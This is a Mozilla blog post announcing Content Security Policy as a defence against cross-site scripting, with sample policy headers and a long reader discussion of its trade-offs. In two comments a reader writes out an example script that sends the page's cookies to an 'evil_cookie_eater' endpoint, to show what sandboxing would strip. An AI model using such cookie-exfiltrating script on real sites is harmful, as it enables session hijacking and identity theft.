Shutting Down XSS with Content Security Policy

Brandon Sterne


For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.
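To make this concrete, here is a sketch of what such a policy might look like as an HTTP response header. The header name and directive syntax follow the early X-Content-Security-Policy draft, and the host trusted.example.com is a made-up example; the final syntax may differ:

```http
X-Content-Security-Policy: allow 'self'; script-src trusted.example.com
```

Under a policy like this, inline script blocks, javascript: URIs, and event-handler attributes are ignored, while a tag such as <script src="https://trusted.example.com/app.js"></script> loads and runs normally because its source host is on the whitelist.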

We realize that this model is dramatically different than the current unrestricted model for the Web. We offer the following case supporting CSP’s adoption:

  1. CSP can be implemented in phases.

    While the biggest security benefit offered by Content Security Policy is the mitigation of XSS through inline script blocking, the migration of all JavaScript to external files may be challenging or time-consuming for some sites. Therefore, sites may choose to use the other features of Content Security Policy without adopting the JavaScript restrictions. Our hope is that this flexibility will provide a wide gate for such sites to adopt CSP in a limited fashion early, and later move toward a full implementation as time and resources permit.
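    For instance (directive names per the early draft, and therefore an assumption), a site could begin with a policy that leaves script handling unchanged but restricts where plugin content and frames may be loaded from:

    ```http
    X-Content-Security-Policy: allow *; object-src 'self'; frame-src 'self'
    ```

    This yields some immediate protection against injected plugins and frames, and script restrictions can be layered on later once the site's JavaScript has been moved to external files.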

  2. Even complex sites can be modified to support CSP.

    We have looked at HTML/JavaScript samples from a wide variety of websites ranging in complexity and have yet to see an example which could not be modified to support CSP. We’ll provide documentation regarding best practices for migrating a site to use CSP. Content Security Policy is also consistent with the programming paradigm “don’t mix code with content” so there may be additional functional benefits to be gained by implementing such separation.

  3. Drive a stake through the heart of XSS!

    XSS vulnerabilities have real value to attackers and are shared rapidly across the Web once discovered. Sites can breathe a little easier knowing that their users are protected, even if an XSS bug slips through. Because CSP can be configured to notify the protected site when an attack is blocked, CSP will even benefit users of older browsers, by helping sites identify and plug vulnerabilities quickly. The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work, and the bar for a successful attack is placed much, much higher.
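    The notification mechanism works through a reporting directive in the policy. As a sketch (the report-uri directive name and the /csp-report path follow the early draft and are assumptions):

    ```http
    X-Content-Security-Policy: allow 'self'; report-uri /csp-report
    ```

    When the browser blocks content that violates the policy, it would send a report describing the violation to that URI, so the site learns about injection attempts even while its users remain protected.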

Content Security Policy has been a collaboration of many individuals and has received input from multiple web sites, browser vendors, and web app security researchers. We are very excited to have reached a level of stability in the design that has allowed us to begin implementation of the CSP specification. Stay tuned for further updates. We will let you know when the fixes have been checked in to trunk and the product is ready to be tested in our nightly builds. Let us know what you think!

Brandon Sterne
Security Program Manager

28 responses

  1. Alan wrote:

    What’s with the text/x-content-security-policy MIME type and X-Content-Security-Policy HTTP header in the spec? Surely if this is a proposed standard then both of these should be standardised and not marked as proprietary? Otherwise it seems a very good proposal to mitigate XSS attacks.

  2. voracity wrote:

    I appreciate your efforts to bolster security on the web, but this is an over-reaction. Has anyone conducted any decent risk analysis of XSS attacks? Involving hard estimates of probabilities and utilities (or at least economic costs)? Has anyone compared these costs to breaches of security via other means (e.g., viruses, malware, browser holes, server exploits, psychological tricks)? Would the costs be within even an order of magnitude? Would the costs be within even several orders of magnitude?

    Please answer these questions before you consider radically changing the culture of the web.

    As far as I can tell, all public website XSS problems can be solved very simply by fixing 3rd party cookie security rights (a la web fonts, XHR, etc.) and using sandboxes. The fact that cross-site cookies today aren’t treated with the same gravity as cross-site XHR et al. (by all browser makers) is an absolute scandal.

    This proposal is an inappropriate response to the problem: it is 10 years in jail for littering. Please — *please* — consider what you are doing very carefully before proceeding.

  3. Daniel Veditz wrote:

    In my own browsing I’ve turned off 3rd party cookies (really off, not Safari and IE’s half-off — “send ‘em if you’ve got ‘em” sounds suspiciously like the fatalistic “smoke ‘em if you’ve got ‘em”). It was no protection from any of the XSS attacks disclosed on http://xxsed.com or in nearly three years of the “So it begins…” thread at http://sla.ckers.org/forum/read.php?3,44

  4. Brandon Sterne wrote:

    @voracity:

    I’m not sure I understand your “over-reaction” argument. Content Security Policy is an opt-in mechanism. The severity of the XSS problem in the wild, and the cost of implementing CSP as a mitigation are open to interpretation by individual sites. If the cost vs. benefit doesn’t make sense for some site, they’re free to keep doing business as usual.

  5. voracity wrote:

    @Brandon: I appreciate that CSP is an opt-in security technique (mandatory would be lunacy) but, unless I’m much mistaken, you intend it to eventually be used by all major sites. Otherwise, why go to such efforts? If all major sites use it, it will have to be taught in colleges and universities as preferred web-programming practice. Hence it will change the current culture.

    “The severity of the XSS problem in the wild … [is] open to interpretation by individual sites.”

    Ah, well, I don’t agree; the severity of the XSS problem is objective. It may not be easy to measure the severity (in terms of economic cost or, more accurately, social harm), but it is nonetheless objective. Are there any studies of the long-term economic costs of XSS attacks as compared to viruses or, say, bad web design?

  6. voracity wrote:

    @Daniel: “[Disabled 3rd party cookies] was no protection from any of the XSS attacks.”

    Really? I hope you’ll understand if I have my doubts.

    You’d at least agree that if someone is logged into their favourite pet store website, an evil 3rd party website can execute privileged actions on the pet store site unless the pet store site has taken appropriate security measures on the server. This wouldn’t be a problem if 3rd party cookie rights were handled properly (that is, as per cross-site XHR and fonts).

    I think we need to be clear about which XSS security issues we are dealing with:

    – HTML injection via GET or POST parameters: These can’t automatically be blocked because you can’t automatically tell the valid from invalid uses of HTML in submitted parameters. Yes, HTML in a GET parameter is unusual today, but it might not always be that way. JSON in a GET parameter was unusual once, too. And page injections here aren’t the real concern (sandboxes can do the protection) — the big worry is injection on the server (e.g. SQL injection, command line injection, out of bounds values, etc.)

    – User submissions and user pages (ebay, facebook, webmail, etc.): Random-boundary sandboxes. Enough said. Also, the style tag should only apply locally within its parent node! (It’s preposterous that style tags are hoisted to document level.) Imagine how simple life would be for the GMail developers if they could simply wrap each email in a conversation in its own sandbox?

    – Identity theft: As I described before, this can be solved by doing 3rd party cookie security properly. Intranets are different, but that’s just because privileges are identified differently (but don’t worry, the problem can still be solved). Identity can also be stolen when cookie authentication is used in conjunction with user submissions — but in those cases, what fixes the problem? Sandboxes.

    Again, the moral of the story is all XSS attacks can be vitiated by proper 3rd party cookie security and sandboxes (very important). In fact, CSP is just a very extreme and very inflexible form of sandbox!

  7. Chase Seibert wrote:

    I can’t tell if this is a domain, page or DOM node based system. Really, we should have all three. For websites that do have a lot of their own javascript, but output dynamic data into HTML templates, the page based whitelist is critical.

  8. Daniel Veditz wrote:

    @Chase: The policy is specified per page, although you could approximate per domain using the policyURI option and having all your pages load the same policy. The whitelisting in the policy is domain-based, or I should say origin-based since you also specify the scheme and port of the site from which you’re allowed to load.

    Could you elaborate on what you meant by a “DOM node based system”?

  9. dan w wrote:

    Thanks for the post on CSP.

    While good web application design does favor separating JavaScript into separate files for both code manageability and efficiency (caching, compression), I wonder how much work it would take most websites to completely rid their webapps of all inline code. Have you done any measurements on this for common applications? Regardless, I think there is value in this approach, because, as you point out, it lets a site that really cares about XSS put in some extra effort to gain better resistance.

    I do not have a deep understanding of the XSS threat model or all the solutions that have been proposed, so I am hoping you can answer a question that I have. It seems that proposals like CSP try to enforce the principle that ‘only whitelisted code can be run on the client’. Since whitelisting code that is inlined in markup seems hard, such code is prohibited. It would seem more flexible if the site’s policy could simply state what code on that page cannot do. For example, prevent any JavaScript on the page from communicating data in any form (e.g., cookies) to anything but the originating site. In a sense, this would be saying “It’s ok if the attacker can inject code on a page, as long as that code cannot do anything truly dangerous” (like steal personal data from the page). Of course, this approach has problems if a browser vulnerability allows JavaScript (or a malformed image) to break out of the sandbox, but that seems like a whole different attack.

    It seems that this approach makes a different trade-off than CSP, favoring flexibility for the web developer at the cost of some (but how much?) lost security. Then again, I may be missing something entirely, as I am no expert on XSS. Thanks.

  10. frenchfries wrote:

    From what I understand, this system would be based on a set of rules defined in HTTP headers or meta tags in the web page. What about using a single text file at the root of the server (like the robots.txt file, or the cross-domain policy file used by Flash)? It’s easier to implement, it takes less bandwidth (it won’t be sent with every response from the server), and it’s probably safer (headers are vulnerable to injection via CRLF poisoning).

  11. voracity wrote:

    @dan w: Sandboxing is conceptually simple. For example, the generated page might contain:

    Innocent text
    new XMLHttpRequest().open("GET", "evil_cookie_eater.php?" + document.cookie)
    More innocent text

    During parsing, the browser would identify the sandbox-boundary sections and strip out — during the parse, not DOM construction — anything dangerous that appears inside, leaving this (for example):

    Innocent text
    More innocent text

    I’m actually pretty confident browser makers will do this eventually (there are too many applications that are cumbersome without it). It’s just a question of whether it’s 1 year, 5 years or 10 years. :)

  12. voracity wrote:

    [Angle brackets got chewed. Is that irony?] Here it is again, with angle brackets replaced with square brackets.

    Before:

    [div sandbox-boundary="CDOIJO809DDMo33mdlkDxjk"]
    Innocent text
    [script]new XMLHttpRequest().open("GET", "evil_cookie_eater.php?" + document.cookie)[/script]
    More innocent text
    [/div sandbox-boundary="CDOIJO809DDMo33mdlkDxjk"]

    After:

    [div sandboxed]
    Innocent text
    More innocent text
    [/div]

  13. PaPPy wrote:

    I know some sites that have shut down due to an XSS worm. It took a lot of time to clean up, and the admin called it quits. XSS against sites that store credit cards, such as Amazon, could also feed the ongoing identity-theft plague.

    Or you could fake a news article, http://www.wired.com/culture/lifestyle/news/2003/02/57506
    And see if you could get real news coverage :D

  14. Andre wrote:

    Has this solution been submitted to the W3C or had an RFC submitted?

  15. Tim Powell wrote:

    How does this policy affect classic bookmarklets (using javascript: URIs) and Greasemonkey scripts? It is unacceptable to lose the ability to customize pages and their interaction. There’s a fundamental difference between JavaScript embedded in or linked to by pages and JavaScript run by bookmarklets and user scripts, but unfortunately they are often treated the same in the security model.

  16. Daniel Veditz wrote:

    Greasemonkey scripts are definitely unaffected. I’m not sure about bookmarklets; if we’ve broken them we’ll try to get them working again.

    The goal of CSP is to protect users by cooperating with site authors to enforce their security policies. This in no way means we’ve forgotten that the browser is the _user’s_ agent. It’s right there in the Mozilla Manifesto: “5. Individuals must have the ability to shape their own experiences on the Internet.”

  17. John Bell wrote:

    I’m very glad to hear that bookmarklets will be repaired if they are broken by CSP. That was my first concern when I heard that this policy was being developed some time ago. I have to say that I am still worried, though, that advanced bookmarklets will be restricted because they act in much the same way as some XSS attacks. For instance, a bookmarklet that bootstraps in a complex JavaScript app via script tags, which then continues to send data back via other script tag includes. The sandbox that allows bookmarklets also needs to recognize that any actions initiated by that bookmarklet later on also need to be included in the sandbox.

  18. William wrote:

    Will this stuff be enforced against javascript run via NPN_Evaluate() from an NPAPI plugin?

  19. Daniel Veditz wrote:

    @John Bell: Some advanced bookmarklets may not work. If the bookmarklet does something that will load data from another site that action will be subject to the CSP whitelist. Anything the bookmarklet adds to the page is part of the page and subject to the limitations on the page.

    It will be possible for users to disable Content Security Policy protection if for some reason they need to do so. The user can weigh the need to run their own script injection against the risk of unauthorized script injection.

    @William: We still have a few blurry edges around plugins. Some plugins can make their own network connections that are completely out of the browser’s control. If there’s enough interest in CSP, some of the plugin vendors may be interested in extending the NPAPI so they can participate in that model. Some people want to be able to control which types of plugin can load, not just the sites they load from. So far we’ve resisted that complication, but it’s useful feedback. We’re currently planning to vet NPN_GetURL() and the like against the plugin-src whitelist.

    Currently NPN_Evaluate is allowed because you allowed the plugin to load, but we can argue that the plugin’s origin should be vetted against the script-src whitelist before being allowed to call NPN_Evaluate(). It’s an open question.

  20. John Bell wrote:

    @Daniel Veditz: I’m disappointed to hear that. Is it at least possible for the user to have a global whitelist that overrides the one defined by the page/headers? A granular way to disable CSP that would allow it to still function in general, but trust all script includes that load from specific domains? I certainly see the value in CSP in general and wouldn’t want to recommend that people disable it completely, but a user whitelist (covered in enough warnings) seems like it would be a reasonable way to add CSP without limiting functionality.

  21. Daniel Veditz wrote:

    @John Bell: It’s good feedback, we’ll have to think about it. It’s certainly “possible” — it’s just code after all.

    I have mixed feelings. I’d really like to get people excited about CSP, site authors and other browser vendors in particular. A user-agent override doesn’t belong in the specification, which is a contract between the site and the browser, and while supporting overrides is a valid implementation decision, talking about it is a bit of a distraction and may even undercut the message to site authors. It would also, of course, require more work on our part, so I’m not unbiased :-)

    On reflection, though, overrides might be a required workaround to avoid breaking add-ons that create mash-ups or add elements to content. Argh.

  22. bugmenot wrote:

    When is this CSP implementation expected to be available?

  23. Arun Ranganathan wrote:

    @Andre: an early version of this solution was submitted to the W3C Web Apps WG. See for example this thread of correspondence:
    http://lists.w3.org/Archives/Public/public-webapps/2008AprJun/0416.html

    The charter of that WG was never modified to include CSP. We’re keen on working with a standards setting body, and are still in the process of determining where the proposal works best.

  24. John Bell wrote:

    @Daniel Veditz: I certainly understand why you want to keep a narrow focus right now. If it was me, I’d actually think about building it into the spec since it’s something that modifies the ruleset applied to the final page. But obviously it’s your spec, you can handle it however you want. I just suspect that one of the questions you’ll get from anybody you’re trying to get excited about CSP is if it breaks any existing functionality, and (as one of the site authors in question) I know that “yes” isn’t as good an answer to that question as “yes, but we have a way around it”.

    But in any case, I’m glad you’re at least open to the possibility. Thanks for listening.

  25. voracity wrote:

    Could someone perhaps explain what is wrong with sub-page sandboxing?

    In particular, what does page-level sandboxing solve that sub-page level sandboxing cannot?

  26. AckNack wrote:

    “On reflection, though, overrides might be a required workaround to avoid breaking add-ons that create mash-ups or add elements to content. Argh.”

    Yes. Greasemonkey would be sure to fail too, unless it’s given privileges to inject JavaScript and content into web pages as it does now.

    As part of these changes, pleeeeease preserve the ability for add-ons to continue to function correctly by allowing event/content/JavaScript injection as they can now do. For example, the DejaClick add-on has a feature to annotate web recordings. It does this by injecting user-recorded popup notes (HTML or SVG) into web pages as it replays (via HTML and CSS content injection). Also, there will soon be a feature in DejaClick to allow users to inject snippets of JavaScript code before or after a replayed event for special circumstances.

    Add-on developers already went through a similar fiasco when they had to add “contentaccessible=yes” to the content directives of all their chrome.manifest files, so I certainly hope we don’t make the same mistakes with this stuff.

  27. Daniel Veditz wrote:

    “CSP, brought to you by the same guys who gave you contentaccessible=yes” — I sense our popularity with add-on developers rising by the day.

  28. austin cheney wrote:

    From a technology perspective this is an elegant solution for two reasons.

    1) It will mostly cure XSS. I have been telling people for months that mitigation is not a solution.

    2) It forces JavaScript off the damn page. This is something HTML should have fixed years ago. In-page JavaScript has been a horrible culprit in namespace collisions that can occur when third-party ad scripts crash your own native code.

    I have noticed four problems that may cause this proposition to fail:

    1) Advertising business interference
    Unfortunately this solution is horribly flawed from a business perspective. Business on the web is extremely reliant upon advertisements whose metrics are tracked by execution of client-side script supplied by those ads. It seems this solution will also eliminate this revenue stream. I expect this to meet some serious criticism.

    2) Not a standard
    I see no indication that this venture is representative of any sort of standard. Security is a universal problem that demands a universal solution. A Firefox favoring proprietary solution will certainly benefit Firefox as a product and reposition it in the grab for market share, but it will not fix the problem. I strongly recommend that this action be written as an internet draft and submitted to the IETF as an extension of URI/HTTP.

    3) No client-side control mechanism
    The root of the problem is that malicious software written by a stranger is executing at will at the user-agent. This solution provides a mechanism for the site to inform the browser of the approved script repository; only script from that repository is then executed, in accordance with the status quo. That mechanism will likely occur as an HTTP header to provide transparency to the user. Unfortunately, this still does not give the user any control over which code should or should not execute. If malicious code is living in the blessed repository, then nothing is gained and attacks continue without the user’s knowledge. A user must be able to make decisions about what is executing in their own software on their own machine, or the problem is merely diminished instead of solved.

    4) Relay points
    There is no indication that scripts cannot point to a reference outside the blessed sandbox, which opens possibilities of attack from a couple of different angles. If script uses the XMLHttpRequest object to point to a location outside the blessed sandbox for additional instructions, then nothing is gained by this mechanism. The mere opening of such a connection could be a point of exploitation even if the code or data being retrieved is entirely benign. Again, notifications must be provided to the user before code executes locally without prior user consent.

    You guys have my full support on this endeavor as drastic steps must be taken to solve this problem. There are more XSS vulnerabilities reported than all other computer security vulnerabilities combined and doubled. If this problem is not solved by any means necessary commerce on the web will fail, and the web itself will fail.

    Before becoming aware of this work I posted a solution of migrating script execution to email using a secure mechanism. The proposal is completely sound from both a technology and security perspective, but is so far extremely unpopular for eliminating execution of events. Since this alternate solution is based on a more complex transmission mechanism it may or may not be helpful. I hope it may provide additional guidance that has not been previously considered.
    http://www.ietf.org/id/draft-cheney-safe-04.txt